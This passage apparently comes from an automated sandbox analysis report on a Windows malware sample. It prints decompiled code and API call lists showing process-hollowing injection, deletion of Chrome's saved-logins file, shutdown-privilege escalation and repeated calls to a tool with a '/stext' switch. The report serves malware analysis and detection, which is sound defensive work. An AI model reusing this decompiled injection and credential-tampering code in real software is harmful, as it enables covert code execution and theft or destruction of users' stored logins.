                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z.MSVCP60(?,00000000), ref: 00404D19
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00404D27
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00404D30
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00404D3F
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00404D4E
                                          • Part of subcall function 00404C0A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00404D5E
                                          • Part of subcall function 00404C0A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404E55
                                          • Part of subcall function 00404C0A: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404E5E
                                          • Part of subcall function 00404C0A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404E67
                                          • Part of subcall function 00404C0A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404E70
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,?,?,?), ref: 00404D72
                                        • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(76902590,?,?,?), ref: 00404D7C
                                        • ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,?,?), ref: 00404D86
                                        • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,?,?), ref: 00404D90
                                        • ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000), ref: 00404DA8
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000010,00000250,?), ref: 00404DCF
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00404DD9
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00404DE2
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,0041B310,?), ref: 00404E0C
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?), ref: 00404E16
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404E31
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404E3A
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404E47
                                        • FindClose.KERNEL32(000000FF,?,?,?), ref: 00404E7D
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 00404E86
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 00404E8F
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 00404E98
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$??1?$basic_string@$D@std@@$D@2@@std@@$??0?$basic_string@$Hstd@@V?$basic_string@$?begin@?$basic_string@$FindG@2@@0@V01@@V10@0@$?end@?$basic_string@D@1@@D@2@@0@FileG@1@@V10@wcscmp$??4?$basic_string@?c_str@?$basic_string@?find@?$basic_string@CloseFirstNextV01@V12@
                                        • String ID:
                                        • API String ID: 1504175218-0
                                        • Opcode ID: b4a4d34770c0ec194417ac69f6ada37e51486882ee5cbf665e722fa8e6873c4f
                                        • Instruction ID: e99c239ae8235e7f5c20d0f9326128258c52c2c7d0b7d23e31a82f6e10cc2207
                                        • Opcode Fuzzy Hash: b4a4d34770c0ec194417ac69f6ada37e51486882ee5cbf665e722fa8e6873c4f
                                        • Instruction Fuzzy Hash: 8A711E7280050EEBCB04EFA0EC899EE777CEF94345F548066F516A31A0EB745649CF98
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040F219, Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 157injectionthreadmemoryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 90%
                                        			E0040F219() {
				void* _t59;
				void* _t60;
				void _t71;
				void* _t72;
				signed int _t74;
				CONTEXT* _t80;
				intOrPtr _t85;
				intOrPtr* _t93;
				signed int _t95;
				void* _t100;
				CONTEXT* _t110;
				struct _PROCESS_INFORMATION* _t114;
				void* _t115;
				void* _t117;

				L00413ECA();
				 *((intOrPtr*)(_t115 - 0x10)) = _t117 - 0x70;
				 *(_t115 - 4) =  *(_t115 - 4) & 0x00000000;
				 *((intOrPtr*)(_t115 - 0x78)) = GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtUnmapViewOfSection");
				_t59 =  *(_t115 + 0xc);
				 *(_t115 - 0x74) = _t59;
				if( *_t59 != 0x5a4d) {
					L16:
					 *(_t115 - 4) =  *(_t115 - 4) | 0xffffffff;
					_t60 = 0;
				} else {
					_t93 =  *((intOrPtr*)(_t59 + 0x3c)) + _t59;
					 *((intOrPtr*)(_t115 - 0x18)) = _t93;
					if( *_t93 != 0x4550) {
						goto L16;
					} else {
						_t95 = 0x11;
						memset(_t115 - 0x60, 0, _t95 << 2);
						_t114 =  *(_t115 + 0x10);
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosd");
						if(CreateProcessW(0,  *(_t115 + 8), 0, 0, 0, 4, 0, 0, _t115 - 0x60, _t114) == 0) {
							goto L16;
						} else {
							_t110 = VirtualAlloc(0, 4, 0x1000, 4);
							 *(_t115 - 0x70) = _t110;
							_t110->ContextFlags = 0x10007;
							if(GetThreadContext(_t114->hThread, _t110) == 0 || ReadProcessMemory(_t114->hProcess, _t110->Ebx + 8, _t115 - 0x1c, 4, 0) == 0) {
								goto L16;
							} else {
								_t71 =  *(_t115 - 0x1c);
								if(_t71 ==  *(_t93 + 0x34)) {
									 *((intOrPtr*)(_t115 - 0x78))(_t114->hProcess, _t71);
								}
								_t72 = VirtualAllocEx(_t114->hProcess,  *(_t93 + 0x34),  *(_t93 + 0x50), 0x3000, 0x40);
								 *(_t115 - 0x6c) = _t72;
								if(_t72 == 0 || WriteProcessMemory(_t114->hProcess, _t72,  *(_t115 + 0xc),  *(_t93 + 0x54), 0) == 0) {
									goto L16;
								} else {
									_t74 = 0;
									 *(_t115 - 0x64) = 0;
									while(_t74 < ( *(_t93 + 6) & 0x0000ffff)) {
										_t100 =  *(_t115 + 0xc);
										_t85 =  *((intOrPtr*)(_t100 + 0x3c)) + (_t74 + _t74 * 4) * 8 + _t100 + 0xf8;
										 *((intOrPtr*)(_t115 - 0x68)) = _t85;
										WriteProcessMemory(_t114->hProcess,  *((intOrPtr*)(_t85 + 0xc)) +  *(_t115 - 0x6c),  *((intOrPtr*)(_t85 + 0x14)) + _t100,  *(_t85 + 0x10), 0);
										 *(_t115 - 0x64) =  *(_t115 - 0x64) + 1;
										_t74 =  *(_t115 - 0x64);
									}
									if(WriteProcessMemory( *_t114,  *(_t115 - 0x70)->Ebx + 8, _t93 + 0x34, 4, 0) == 0) {
										goto L16;
									} else {
										_t80 =  *(_t115 - 0x70);
										_t80->Eax =  *((intOrPtr*)(_t93 + 0x28)) +  *(_t115 - 0x6c);
										if(SetThreadContext(_t114->hThread, _t80) == 0 || ResumeThread(_t114->hThread) == 0xffffffff) {
											goto L16;
										} else {
											_t60 = 1;
										}
									}
								}
							}
						}
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t115 - 0xc));
				return _t60;
			}

















                                        0x0040f21e
                                        0x0040f229
                                        0x0040f22c
                                        0x0040f247
                                        0x0040f24a
                                        0x0040f24d
                                        0x0040f255
                                        0x0040f3c7
                                        0x0040f3c7
                                        0x0040f3cb
                                        0x0040f25b
                                        0x0040f25e
                                        0x0040f260
                                        0x0040f269
                                        0x00000000
                                        0x0040f26f
                                        0x0040f271
                                        0x0040f277
                                        0x0040f279
                                        0x0040f27e
                                        0x0040f27f
                                        0x0040f280
                                        0x0040f281
                                        0x0040f29c
                                        0x00000000
                                        0x0040f2a2
                                        0x0040f2b2
                                        0x0040f2b4
                                        0x0040f2b7
                                        0x0040f2c9
                                        0x00000000
                                        0x0040f2f1
                                        0x0040f2f1
                                        0x0040f2f7
                                        0x0040f2fc
                                        0x0040f2fc
                                        0x0040f30e
                                        0x0040f314
                                        0x0040f319
                                        0x00000000
                                        0x0040f33a
                                        0x0040f33a
                                        0x0040f33c
                                        0x0040f33f
                                        0x0040f34a
                                        0x0040f353
                                        0x0040f35a
                                        0x0040f371
                                        0x0040f373
                                        0x0040f376
                                        0x0040f376
                                        0x0040f396
                                        0x00000000
                                        0x0040f398
                                        0x0040f39e
                                        0x0040f3a1
                                        0x0040f3b3
                                        0x00000000
                                        0x0040f3c3
                                        0x0040f3c3
                                        0x0040f3c3
                                        0x0040f3b3
                                        0x0040f396
                                        0x0040f319
                                        0x0040f2c9
                                        0x0040f29c
                                        0x0040f269
                                        0x0040f3d0
                                        0x0040f3db

                                        APIs
                                        • _EH_prolog.MSVCRT ref: 0040F21E
                                        • GetModuleHandleA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,?,00000000,73BCF560), ref: 0040F23A
                                        • GetProcAddress.KERNEL32(00000000), ref: 0040F241
                                        • CreateProcessW.KERNEL32 ref: 0040F294
                                        • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004,?,00000000,73BCF560), ref: 0040F2AC
                                        • GetThreadContext.KERNEL32(?,00000000,?,00000000,73BCF560), ref: 0040F2C1
                                        • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,00000000,73BCF560), ref: 0040F2E3
                                        • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,00000000,73BCF560), ref: 0040F30E
                                        • WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000,?,00000000,73BCF560), ref: 0040F330
                                        • WriteProcessMemory.KERNEL32(?,?,?,?,00000000,?,00000000,73BCF560), ref: 0040F371
                                        • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,00000000,73BCF560), ref: 0040F392
                                        • SetThreadContext.KERNEL32(?,?,?,00000000,73BCF560), ref: 0040F3AB
                                        • ResumeThread.KERNEL32(?,?,00000000,73BCF560), ref: 0040F3B8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: Process$Memory$ThreadWrite$AllocContextVirtual$AddressCreateH_prologHandleModuleProcReadResume
                                        • String ID: NtUnmapViewOfSection$ntdll.dll
                                        • API String ID: 65594003-1050664331
                                        • Opcode ID: 312b707a27dd8bcb1a4e909d494afcf009e2eee7a57a0b06384939ffbc38e31b
                                        • Instruction ID: 14082434b540fb9a952e0d1072ae94245c422bc39d8110babfce67740ad62d51
                                        • Opcode Fuzzy Hash: 312b707a27dd8bcb1a4e909d494afcf009e2eee7a57a0b06384939ffbc38e31b
                                        • Instruction Fuzzy Hash: 0E513A71A00204EFDB219F64CC85FAABBB9FF84710F20407AE914EB2A1D775E815CB58
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040710F, Relevance: 26.3, APIs: 11, Strings: 4, Instructions: 65fileCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 32%
                                        			E0040710F() {
				char _v5;
				char _v6;
				char _v24;
				void* _v40;
				char* _t12;
				CHAR* _t13;
				long _t20;
				char* _t21;
				void* _t25;

				_t12 = getenv("UserProfile");
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t12,  &_v5, "\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data");
				_t13 =  &_v24;
				L00414170();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t13, _t12);
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				if(DeleteFileA(_t13) != 0) {
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v6);
					E00407A90("\n[Chrome StoredLogins found, cleared!]");
					_t25 = 1;
					L8:
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					return _t25;
				}
				_t20 = GetLastError();
				if(_t20 == 0) {
					_t21 =  &_v6;
					L5:
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t21);
					E00407A90("\n[Chrome StoredLogins not found]");
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					return 1;
				}
				if(_t20 == 1) {
					_t21 =  &_v5;
					goto L5;
				}
				_t25 = 0;
				goto L8;
			}












                                        0x00407124
                                        0x0040712f
                                        0x00407136
                                        0x0040713a
                                        0x00407145
                                        0x0040714e
                                        0x0040715d
                                        0x004071b1
                                        0x004071b7
                                        0x004071bf
                                        0x004071c1
                                        0x004071c4
                                        0x00000000
                                        0x004071ca
                                        0x00407166
                                        0x00407167
                                        0x0040719c
                                        0x00407178
                                        0x0040717e
                                        0x00407184
                                        0x0040718f
                                        0x00000000
                                        0x00407195
                                        0x0040716a
                                        0x00407173
                                        0x00000000
                                        0x00407176
                                        0x0040716c
                                        0x00000000

                                        APIs
                                        • getenv.MSVCRT ref: 00407124
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 0040712F
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 0040713A
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407145
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040714E
                                        • DeleteFileA.KERNEL32(00000000), ref: 00407155
                                        • GetLastError.KERNEL32 ref: 0040715F
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Chrome StoredLogins not found],00000000), ref: 0040717E
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040718F
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Chrome StoredLogins found, cleared!],00000000), ref: 004071B1
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004071C4
                                        Strings
                                        • [Chrome StoredLogins found, cleared!], xrefs: 004071AC
                                        • [Chrome StoredLogins not found], xrefs: 00407179
                                        • UserProfile, xrefs: 0040711F
                                        • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 00407119
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@??1?$basic_string@D@1@@$?c_str@?$basic_string@D@2@@0@DeleteErrorFileHstd@@LastV10@V?$basic_string@getenv
                                        • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                        • API String ID: 3740952235-1062637481
                                        • Opcode ID: 14abc8a0a64898b0e6148fec52b2315570b0cd587dd224fa0db585d81b73ae0c
                                        • Instruction ID: 31ca8e98cb087ed4ee3b22d3c36486bbccf77f9584d8598ce9e7038f5dc1f740
                                        • Opcode Fuzzy Hash: 14abc8a0a64898b0e6148fec52b2315570b0cd587dd224fa0db585d81b73ae0c
                                        • Instruction Fuzzy Hash: 51118475904509EBCB00BBE0ED4E9FE7738DA547417504036E812E32E1EA796A45CBAA
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040EC0F, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 84%
                                        			E0040EC0F() {
				void* _v8;
				intOrPtr _v12;
				struct _TOKEN_PRIVILEGES _v24;
				signed int _t14;

				OpenProcessToken(GetCurrentProcess(), 0x28,  &_v8);
				LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
				_v24.PrivilegeCount = 1;
				_v12 = 2;
				AdjustTokenPrivileges(_v8, 0,  &_v24, 0, 0, 0);
				_t14 = GetLastError();
				asm("sbb eax, eax");
				return  ~( ~_t14);
			}







                                        0x0040ec23
                                        0x0040ec35
                                        0x0040ec46
                                        0x0040ec4d
                                        0x0040ec54
                                        0x0040ec5a
                                        0x0040ec62
                                        0x0040ec68

                                        APIs
                                        • GetCurrentProcess.KERNEL32(00000028,?,0041B310,?,?,?,?,?,0040DF86), ref: 0040EC1C
                                        • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,0040DF86), ref: 0040EC23
                                        • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040EC35
                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0040EC54
                                        • GetLastError.KERNEL32 ref: 0040EC5A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                        • String ID: SeShutdownPrivilege
                                        • API String ID: 3534403312-3733053543
                                        • Opcode ID: c00110eb4c6ec2bacec55e51135d224bb90ade642968878b66c6ed2f365041fe
                                        • Instruction ID: 48ce616a36d9155281e91bb523584d4266b4366c7e509a05eb39360af07fb4fb
                                        • Opcode Fuzzy Hash: c00110eb4c6ec2bacec55e51135d224bb90ade642968878b66c6ed2f365041fe
                                        • Instruction Fuzzy Hash: EFF01271941129FBDB00ABE0ED0DAEF7EBCEB49744F104120B906E1090C6749A08CAA5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040AE6A, Relevance: 173.7, APIs: 98, Strings: 1, Instructions: 485filesleepCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040AE88
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040AEA4
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040AEB4
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040AEC1
                                          • Part of subcall function 004124BE: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 004124CD
                                          • Part of subcall function 004124BE: time.MSVCRT ref: 004124E5
                                          • Part of subcall function 004124BE: srand.MSVCRT ref: 004124F2
                                          • Part of subcall function 004124BE: rand.MSVCRT ref: 00412506
                                          • Part of subcall function 004124BE: rand.MSVCRT ref: 0041251A
                                          • Part of subcall function 004124BE: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@D@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 0041252D
                                          • Part of subcall function 004124BE: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 0041253D
                                          • Part of subcall function 004124BE: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 00412546
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AED3
                                          • Part of subcall function 0041358B: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040969A,?,?), ref: 0041359B
                                          • Part of subcall function 0041358B: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,0040969A,?,?), ref: 004135B2
                                          • Part of subcall function 0041358B: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040969A,?,?), ref: 004135CA
                                          • Part of subcall function 0041358B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040969A,?,?), ref: 004135D3
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AEEB
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AEFD
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AF18
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AF2A
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AF42
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AF4B
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60( /stext ",?,?,00415628,00000000), ref: 0040AF69
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 0040AF7B
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040AF88
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 0040AF95
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040AF9F
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040AFB2
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040AFBB
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040AFC4
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040AFCD
                                        • Sleep.KERNEL32(00000064), ref: 0040AFDD
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AFE6
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60( /stext ",?,?,00415628,00000000), ref: 0040AFFA
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 0040B00C
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040B019
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 0040B026
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040B030
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B043
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B04C
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B055
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040B066
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60( /stext ",?,?,00415628,00000000), ref: 0040B07D
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 0040B08F
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040B09C
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 0040B0A9
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040B0B3
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B0C7
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B0D0
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B0D9
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B0E2
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040B0EB
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60( /stext ",?,?,00415628,00000000), ref: 0040B0FF
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 0040B111
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040B11E
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 0040B12B
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040B135
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B149
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B152
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B15B
